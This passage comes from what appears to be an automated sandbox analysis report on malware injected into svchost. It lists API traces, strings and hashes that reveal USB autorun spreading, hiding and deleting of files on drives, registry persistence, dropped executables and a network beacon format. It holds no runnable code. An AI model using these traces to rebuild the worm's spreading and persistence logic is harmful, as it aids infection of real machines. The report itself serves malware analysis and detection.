DnsExtractRecordsFromMessage_W.DNSAPI(000215D6,?,?), ref: 00021364
DnsRecordListFree.DNSAPI(?,00000001), ref: 0002138D
CloseHandle.KERNEL32(00000000), ref: 00021395
closesocket.WS2_32(?), ref: 0002139D
HeapFree.KERNEL32(00000000,?,00000000), ref: 000213AD
HeapFree.KERNEL32(00000000,000215D6,00000000), ref: 000213BD

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: Heap$Free$AllocateByteCharEventMultiWide$Buffer_CloseCreateExtractFromHandleListMessage_ObjectQuestionRecordRecordsSelectSingleWaitWriteclosesocketrecvfromsendtosocket
String ID:
API String ID: 3117261188-0
Opcode ID: d289c797924f79de744e79cda91552966516e6b96953fabc4a4284b90282829d
Instruction ID: d64e9c556fcfb5a0ccc3b7b5cdc9ad452adf9344b05153ecfe3c5b1745fb3474
Opcode Fuzzy Hash: d289c797924f79de744e79cda91552966516e6b96953fabc4a4284b90282829d
Instruction Fuzzy Hash: 82517130900219BAEF61EB90ED42FDDB6B6BF14710F248124F650BA0F1D7B59A54DB24

Uniqueness

Uniqueness Score: -1.00%

Function 001E4E6D Relevance: 13.7, APIs: 9, Instructions: 196
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32(?,00000000), ref: 001E4E7A
__calloc_crt.LIBCMT ref: 001E4E86

Part of subcall function 001E4B0D: Sleep.KERNEL32(00000000), ref: 001E4B35

__calloc_crt.LIBCMT ref: 001E4F26
GetFileType.KERNEL32 ref: 001E4FAD

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: __calloc_crt$FileInfoSleepStartupType
String ID:
API String ID: 591920814-0
Opcode ID: b5c6b95ae49224e67f321412c33b9233d8216211b2e7548a861568e0c1d23acc
Instruction ID: 6d4a0aed3eaa9570ec793c0cc808fc959ad108616259e0b42a6c6e6cfa29958d
Opcode Fuzzy Hash: b5c6b95ae49224e67f321412c33b9233d8216211b2e7548a861568e0c1d23acc
Instruction Fuzzy Hash: E161F671900F818FD720CF6AC888B2D7BE5AF19734F294668E566DB2E2D730D845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00020776 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.ADVAPI32(software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0002079D
RegEnumValueW.ADVAPI32(?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 000207C9
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000), ref: 000207E5
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,?,00001000,00000004,?,00000000,?,00000020,00000000,00000000), ref: 0002080A
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,00000000,00000000,?,?,00000000,?,00001000,00000004,?,00000000), ref: 00020825
RegCloseKey.ADVAPI32(?,?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000,00020019,00000000,?), ref: 00020835
RtlExitUserThread.NTDLL(00000000,software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0002083C

Strings

id:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%lu, xrefs: 000205DD
software\microsoft, xrefs: 00020782, 00020796
, xrefs: 000207AA

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: ValueVirtual$AllocCloseCreateEnumExitFreeQueryThreadUser
String ID: $id:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%lu$software\microsoft
API String ID: 370110947-1820778675
Opcode ID: c74316f4ad1b2afb49dda309f0bf995519bf959f2d1df23f5c639d5e484c898a
Instruction ID: 2fb70a33149fc07271206229af12b4087d01f7760a434be6e2cb247919877b31
Opcode Fuzzy Hash: c74316f4ad1b2afb49dda309f0bf995519bf959f2d1df23f5c639d5e484c898a
Instruction Fuzzy Hash: B411FE71950218BEFB159BD0ED42FEEB6BDEB18700F104165FA00B5092EBB0AA14DB65

Uniqueness

Uniqueness Score: -1.00%

Function 001E1070 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32(001F0001,00000000,TLS,?,001E32D1,?,?,?,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E1084
CreateMutexW.KERNELBASE(00000000,00000000,TLS,?,001E32D1,?,?,?,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E1095
CreateThread.KERNELBASE(00000000,00000000,001E10D0,typedef struct,00000000,00000001), ref: 001E10AF

Strings

TLS, xrefs: 001E1079, 001E108E
typedef struct, xrefs: 001E10A1

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: CreateMutex$OpenThread
String ID: TLS$typedef struct
API String ID: 3612403252-68249997
Opcode ID: 23e2531ac7a6ea6acbe585ed0c49941e39ffbd257bf12102053035fc8a16ba29
Instruction ID: 25f9a1cbee7b0ba13bb0b092d20ae64d5dac984ffd1e4b75138d38f9462a9260
Opcode Fuzzy Hash: 23e2531ac7a6ea6acbe585ed0c49941e39ffbd257bf12102053035fc8a16ba29
Instruction Fuzzy Hash: 43E048753807C97BE720DB926C4AFAE375C9B50B14F404015BD0DDA5C1D7F4B580C521

Uniqueness

Uniqueness Score: -1.00%

Function 000213C9 Relevance: 3.0, APIs: 2, Instructions: 31
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DnsQuery_A.DNSAPI(?,00000001,00000000,00000000,?,00000000), ref: 000213E1
DnsRecordListFree.DNSAPI(?,00000001), ref: 0002140A

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: FreeListQuery_Record
String ID:
API String ID: 3988062426-0
Opcode ID: e64dc5f6cf2fc8e564f1c36a5e35bb8c1e36c6d0ea91e30a76e609308c0fee21
Instruction ID: 917bba8bad55b8de9bf1036380321a6f7db63df5757736f3a015b48b7591bb7a
Opcode Fuzzy Hash: e64dc5f6cf2fc8e564f1c36a5e35bb8c1e36c6d0ea91e30a76e609308c0fee21
Instruction Fuzzy Hash: 81F03A70A10218EFEB14DF54D886FED77B6EB14304F1041A5F5049B2A1E3B1EF81DA50

Uniqueness

Uniqueness Score: -1.00%

Function 00022199 Relevance: 2.6, APIs: 2, Instructions: 87
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,00000010,?,00020454,00000020,00000010,?), ref: 000221ED
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00022292

Part of subcall function 000220F2: VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,00000000), ref: 00022129
Part of subcall function 000220F2: VirtualFree.KERNEL32(00000010,00000000,00008000,00000000,?,00001000,00000040,00000000), ref: 00022167

Part of subcall function 00021FD8: LoadLibraryA.KERNEL32(00000010,?,?,00000000), ref: 00022002

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: Virtual$AllocFree$LibraryLoad
String ID:
API String ID: 1149141302-0
Opcode ID: 0af6b46702dc183195f19cb2ee8ae2ed94e6b90bf3743bbb5b7d8b6fb53bedba
Instruction ID: cb17b7bbbe5fa87d1700283ba1511cf1a02a65c0a4515a74beb7e1cf3b5194b8
Opcode Fuzzy Hash: 0af6b46702dc183195f19cb2ee8ae2ed94e6b90bf3743bbb5b7d8b6fb53bedba
Instruction Fuzzy Hash: B3318070600329FBDF61DFD4ED82FD9BBB8AF14300F5045A1BA00AA092D771DA54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 000220F2 Relevance: 2.5, APIs: 2, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,00000000), ref: 00022129
VirtualFree.KERNEL32(00000010,00000000,00008000,00000000,?,00001000,00000040,00000000), ref: 00022167

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: cd798245b2e76542509d64b98d3e12ff8ec292439d66e5525a18435d546579e6
Instruction ID: 32e71e1972f89b0f3150727d6f8afb84db78b1aef7f0e9d6d9e16e5f30cf3838
Opcode Fuzzy Hash: cd798245b2e76542509d64b98d3e12ff8ec292439d66e5525a18435d546579e6
Instruction Fuzzy Hash: 97110575940208ABDF84DF94DC81B8EB7B5BF08314F158090ED186B386D770FA50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00021FD8 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000010,?,?,00000000), ref: 00022002

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 25d991ee594b92c996d61e6126097692e3d5b1e43fd5b8b39e8d1785e9ab938a
Instruction ID: a0318e93728828441751b9b79375662a1b03e81b9d609222f75a0b945b8376d4
Opcode Fuzzy Hash: 25d991ee594b92c996d61e6126097692e3d5b1e43fd5b8b39e8d1785e9ab938a
Instruction Fuzzy Hash: 96118472900229FBDF60CF89DCC0B9A77A8EF15354B184060ED05DB256D335ED54CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E46B8 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,001E4B23,00000000,00000001,00000000,00000000,00000000,?,001E4228,00000001,00000214,?,001E4AD9), ref: 001E46FB

Part of subcall function 001E3660: __getptd_noexit.LIBCMT ref: 001E3660

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 442087e6c3c3495d1c55b8845976543a6c7f19baa29af6a87fc46c721d63f688
Instruction ID: 025902a9c07dfae11a62572a58b6260b62c78ca4dc90e5233a57cc36847cfd8e
Opcode Fuzzy Hash: 442087e6c3c3495d1c55b8845976543a6c7f19baa29af6a87fc46c721d63f688
Instruction Fuzzy Hash: 2D01FC35201A959BEB289F37DC48B6E3384AF86BA0F008569E8168B590EB308C40C680

Uniqueness

Uniqueness Score: -1.00%

Function 00081153 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?), ref: 0008116D

Memory Dump Source

Source File: 00000009.00000002.381464840.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_80000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4e4ed2526a693afd537bf01d943d5a8d2f998349fa7a9eea0a5145a2123ba823
Instruction ID: e0234c374da8b9b25d2d5619e3029d70313bffc099d0792054f9322e6152414a
Opcode Fuzzy Hash: 4e4ed2526a693afd537bf01d943d5a8d2f998349fa7a9eea0a5145a2123ba823
Instruction Fuzzy Hash: 2C017172A04219ABEF60DF15DC88BDA77ACFF103A4F198121EE59EB241D730ED1187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00020BD4 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75b8324241d3d0439ea00671a6b8127546a6cfe79488f1b8daba38fea9b6d577
Instruction ID: b45fa52f8c40281fa6ad0ebdb6a2ad6170e8a4b756024867c35bdb331d14aa2b
Opcode Fuzzy Hash: 75b8324241d3d0439ea00671a6b8127546a6cfe79488f1b8daba38fea9b6d577
Instruction Fuzzy Hash: FEF02B611583EB5AD7127F6856065CCEB664B2277C7F88559D941AF443D724C40AC324

Uniqueness

Uniqueness Score: -1.00%

Function 001E40C6 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,001E837C,001EEF00,00000314,00000000,?,?,?,?,?,001E7A4F,001EEF00,Microsoft Visual C++ Runtime Library,00012010), ref: 001E40C8

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: e8b6a717469c442fde92eb478f56aee04da615850206d42d2f74a29996334256
Instruction ID: bfccb8bc635d79b1ddfcc264067e6d7c482d0c07bf75be3107ec215038a9957c
Opcode Fuzzy Hash: e8b6a717469c442fde92eb478f56aee04da615850206d42d2f74a29996334256
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001E1700 Relevance: 73.8, APIs: 27, Strings: 15, Instructions: 332filestringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 001E176E
FindFirstFileW.KERNEL32(?,?,756F412B,?,001E121A), ref: 001E1781
wsprintfW.USER32 ref: 001E1844
wsprintfW.USER32 ref: 001E1859
wsprintfW.USER32 ref: 001E187B
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1887
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1899
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E18A6
wsprintfW.USER32 ref: 001E1930
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E193C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E194E
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E195B
lstrcmpiW.KERNEL32(?,.LNK,?,?,?,?,001E121A), ref: 001E1988
wsprintfW.USER32 ref: 001E19A8
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E19B4
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E19C6
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E19D3
lstrcmpiW.KERNEL32(?,.INF,?,?,?,?,001E121A), ref: 001E19FC
lstrcmpiW.KERNEL32(?,.INI,?,?,?,?,001E121A), ref: 001E1A2C
wsprintfW.USER32 ref: 001E1A8A
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1A96
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E1AAC
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1AB9
wsprintfW.USER32 ref: 001E1B19
SetFileAttributesW.KERNEL32(?,00000006,?,?,?,?,?,?,?,?,001E121A), ref: 001E1B27
FindNextFileW.KERNEL32(?,?,?,001E121A), ref: 001E1B3B
FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1B4A

Strings

Thumbs.db, xrefs: 001E1A36
.vbs, xrefs: 001E1750
%s\*, xrefs: 001E173A
%s%s, xrefs: 001E1875
.LNK, xrefs: 001E197B
%s\%s, xrefs: 001E183E, 001E192A, 001E19A2, 001E1A84, 001E1B13
.cmd, xrefs: 001E1764
.INF, xrefs: 001E19EF
.INI, xrefs: 001E1A1F
%s.exe, xrefs: 001E1853
.bat, xrefs: 001E1722
.exe, xrefs: 001E1746
~$W, xrefs: 001E190A
LaunchU3.exe, xrefs: 001E1AC0
.pif, xrefs: 001E175A

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: File$Deletewsprintf$Attributes$Findlstrcmpi$CloseFirstNext
String ID: %s%s$%s.exe$%s\%s$%s\*$.INF$.INI$.LNK$.bat$.cmd$.exe$.pif$.vbs$LaunchU3.exe$Thumbs.db$~$W
API String ID: 737707242-3294740035
Opcode ID: fec512aac4829346cc847915e40b7bb0041c52fc50b8ebfeb63b1a3f234bf72a
Instruction ID: a358d29ea60f25bc7e2f667e9cd07f914730b2d6dadc4d570067a6905d58de3d
Opcode Fuzzy Hash: fec512aac4829346cc847915e40b7bb0041c52fc50b8ebfeb63b1a3f234bf72a
Instruction Fuzzy Hash: F8C1E472900699BACB24DBA1CC44EEE7379FF68750F408695E909A7140F771EBC8CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000228B8 Relevance: 52.7, APIs: 26, Strings: 4, Instructions: 186registryfilememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00021535: lstrlen.KERNEL32(00000000), ref: 00021552
Part of subcall function 00021535: RtlAllocateHeap.NTDLL(00000000,00000001,00000000), ref: 00021569
Part of subcall function 00021535: lstrcpy.KERNEL32(00000000,00000000), ref: 0002158C
Part of subcall function 00021535: socket.WS2_32(00000002,00000001,00000006), ref: 00021610
Part of subcall function 00021535: connect.WS2_32(?,00000002,00000010), ref: 0002162A
Part of subcall function 00021535: RtlAllocateHeap.NTDLL(00000008,00000401,00000002), ref: 00021644
Part of subcall function 00021535: wsprintfA.USER32 ref: 0002166B
Part of subcall function 00021535: send.WS2_32(?,00000000,00000000,00000000), ref: 00021694
Part of subcall function 00021535: send.WS2_32(?,00000000,00000020,00000000), ref: 000216AA
Part of subcall function 00021535: recv.WS2_32(?,00000000,00000400,00000002), ref: 000216BC

NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 0002291B
VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,?,00000000,00000000,00000001), ref: 00022958
GetModuleFileNameW.KERNEL32(00000000,?,00008000,00000000,00008000,00001000,00000004,?,00000000,00000000,00000001), ref: 00022972
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0002298C
GetFileTime.KERNEL32(?,?,?,?,?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00008000,00000000,00008000), ref: 000229A3
CloseHandle.KERNEL32(?), ref: 000229AB
lstrcpy.KERNEL32(?,?), ref: 000229BF
RegOpenKeyExA.ADVAPI32(?,00000000,00020019,?,?,?,?,?,?,?,?,80000000,00000001,00000000,00000003,00000080), ref: 000229D8
wsprintfW.USER32 ref: 000229F8
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00008000), ref: 00022A18
RegCloseKey.ADVAPI32(?,00000000,?,?,00000000,00000000,?,00008000), ref: 00022A21
ExpandEnvironmentStringsW.KERNEL32(%tmp%\,?,00008000,00000000,?,?,00000000,00000000,?,00008000), ref: 00022A38
GetTickCount.KERNEL32(%tmp%\,?,00008000,00000000,?,?,00000000,00000000,?,00008000), ref: 00022A47
wsprintfW.USER32 ref: 00022A53
CloseHandle.KERNEL32(00000000), ref: 00022A61
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 00022A78
WriteFile.KERNEL32(?,?,?,00008000,00000000), ref: 00022A9C
SetFileTime.KERNEL32(?,?,?,?,?,?,?,00008000,00000000,?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 00022AB0
CloseHandle.KERNEL32(?), ref: 00022AB8
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00022AE5
CloseHandle.KERNEL32(00000000), ref: 00022AF4
ResumeThread.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 00022AFC
CloseHandle.KERNEL32(?), ref: 00022B04
CloseHandle.KERNEL32(?), ref: 00022B0C
VirtualFree.KERNEL32(?,00000000,00008000,?,40000000,00000000,00000000,00000002,00000006,00000000,00000000,?,?,00000000,00000000,?), ref: 00022B25
HeapFree.KERNEL32(00000000,00022DC2,00000000), ref: 00022B35

Strings

D, xrefs: 00022AC9
%08x.exe, xrefs: 00022A4D
%tmp%\, xrefs: 00022A33
%lu, xrefs: 000229F0

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: Close$FileHandle$CreateHeapwsprintf$AllocateFreeTimeVirtuallstrcpysend$AllocCountDelayEnvironmentExecutionExpandModuleNameOpenProcessQueryResumeStringsThreadTickValueWriteconnectlstrlenrecvsocket
String ID: %08x.exe$%lu$%tmp%\$D
API String ID: 2201620439-1581451172
Opcode ID: 1ead3e0e0c4784b2e39803a329a854da72fce99b689297478ee766f0d55feeb3
Instruction ID: cf74aea69abc5c0a2de0252094b142b6ca5f53f96e84daba7efb3699e1ff795d
Opcode Fuzzy Hash: 1ead3e0e0c4784b2e39803a329a854da72fce99b689297478ee766f0d55feeb3
Instruction Fuzzy Hash: C3616171940229FAEF21AFD0ED42FEEBB79FF04700F204165B614B90E2DBB55A549B14

Uniqueness

Uniqueness Score: -1.00%

Function 000223DC Relevance: 47.4, APIs: 23, Strings: 4, Instructions: 169registrystringmemoryCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 0002243B
GetTickCount.KERNEL32(?,00000000,00000000,00000001,?), ref: 0002246A
wsprintfW.USER32 ref: 0002247C
VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,00000000,00000001,?), ref: 00022492
ExpandEnvironmentStringsW.KERNEL32(%allusersprofile%\,?,00008000,00000000,00008000,00001000,00000004,00000000,00000001,?), ref: 000224AF
SetCurrentDirectoryW.KERNEL32(?,%allusersprofile%\,?,00008000,00000000,00008000,00001000,00000004,00000000,00000001,?), ref: 000224B7
lstrcatW.KERNEL32(?,?), ref: 000224C3
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 000224DA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000224FE
CloseHandle.KERNEL32(?), ref: 00022506
LoadLibraryW.KERNEL32(?), ref: 0002250F
GetProcAddress.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 00022527
FreeLibrary.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000,?,40000000,00000000,00000000,00000002,00000006), ref: 00022533
wsprintfA.USER32 ref: 0002254B
lstrcpy.KERNEL32(?,software\microsoft), ref: 0002255D
RegOpenKeyExA.ADVAPI32(?,00000000,00020006,?,?,software\microsoft,00008000,00001000,00000004,00000000,00000001,?), ref: 00022576
lstrlen.KERNEL32(00000000,?,00000000,00020006,?,?,software\microsoft,00008000,00001000,00000004,00000000,00000001,?), ref: 00022590
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,000203C7,00000001,?,00000000,00020006,?,?,software\microsoft,00008000,00001000,00000004,00000000), ref: 000225A5
RegCloseKey.ADVAPI32(?,?,?,00000000,00000001,000203C7,00000001,?,00000000,00020006,?,?,software\microsoft,00008000,00001000,00000004), ref: 000225B8
GetSystemDirectoryW.KERNEL32(?,00008000), ref: 000225C5
SetCurrentDirectoryW.KERNEL32(?,?,00008000,?,40000000,00000000,00000000,00000002,00000006,00000000,?,%allusersprofile%\,?,00008000,00000000,00008000), ref: 000225CD
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00008000,?,40000000,00000000,00000000,00000002,00000006,00000000,?,%allusersprofile%\,?), ref: 000225DC
HeapFree.KERNEL32(00000000,?,00000000), ref: 000225EC

Strings

ms%08X.dat, xrefs: 00022542
%allusersprofile%\, xrefs: 000224AA
ms%08X.dat, xrefs: 00022473
software\microsoft, xrefs: 00022553, 00022559

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: DirectoryFree$CloseCurrentFileLibraryVirtualwsprintf$AddressAllocCountCreateDelayEnvironmentExecutionExpandHandleHeapLoadOpenProcStringsSystemTickValueWritelstrcatlstrcpylstrlen
String ID: %allusersprofile%\$ms%08X.dat$ms%08X.dat$software\microsoft
API String ID: 2256298638-91618351
Opcode ID: c9d5c12deb963359a54036b078a3b5927ef3408201523df2f3d861e7edd93e86
Instruction ID: 8d505b397fdd412efd8254c59b3839057c77ae7ec9457711c48ca49aa367cb38
Opcode Fuzzy Hash: c9d5c12deb963359a54036b078a3b5927ef3408201523df2f3d861e7edd93e86
Instruction Fuzzy Hash: 5A515270D50238BAEF61ABE0FD52FEDBAB9AF04714F108034FA107A1E2D7B599519B50

Uniqueness

Uniqueness Score: -1.00%

Function 001E29C0 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 171sleepregistryfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001E2A21
UnregisterDeviceNotification.USER32 ref: 001E2A6C
CloseHandle.KERNEL32(?), ref: 001E2A81
UnregisterDeviceNotification.USER32 ref: 001E2A9D
CloseHandle.KERNEL32(?), ref: 001E2AB2
wsprintfW.USER32 ref: 001E2B00
GetDriveTypeW.KERNEL32(?), ref: 001E2B10
GetDriveTypeW.KERNEL32(?), ref: 001E2B1C
wsprintfW.USER32 ref: 001E2B36
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000006,00000000), ref: 001E2B56
RegisterDeviceNotificationW.USER32 ref: 001E2BC2
Sleep.KERNEL32(00000000), ref: 001E2BD3
DefWindowProcW.USER32(?,?,?,?), ref: 001E2BE7
UnregisterDeviceNotification.USER32 ref: 001E2C05
CloseHandle.KERNEL32(?), ref: 001E2C0C
PostQuitMessage.USER32 ref: 001E2C14

Strings

%sautorun.inf, xrefs: 001E2B30
,, xrefs: 001E2BAE
%c:\, xrefs: 001E2AFA

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: DeviceNotification$CloseHandleUnregister$DriveTypewsprintf$CreateFileMessagePostProcQuitRegisterSleepWindow_memset
String ID: %c:\$%sautorun.inf$,
API String ID: 1181696527-3149172787
Opcode ID: 3367b166259b102e33d136c77fcb0e016d0473c88841af36f697ecafa1e6476d
Instruction ID: 35aff73c0f7ca3073849c40462604c70eb418a00874650ea8877a3aa9de7c2c2
Opcode Fuzzy Hash: 3367b166259b102e33d136c77fcb0e016d0473c88841af36f697ecafa1e6476d
Instruction Fuzzy Hash: E35149715047859FC320DFA9DC99A6FB7E8BB88710F004A2DF996C7690E731D944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001E1E80 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 246fileCOMMON

Download Yara Rule

APIs

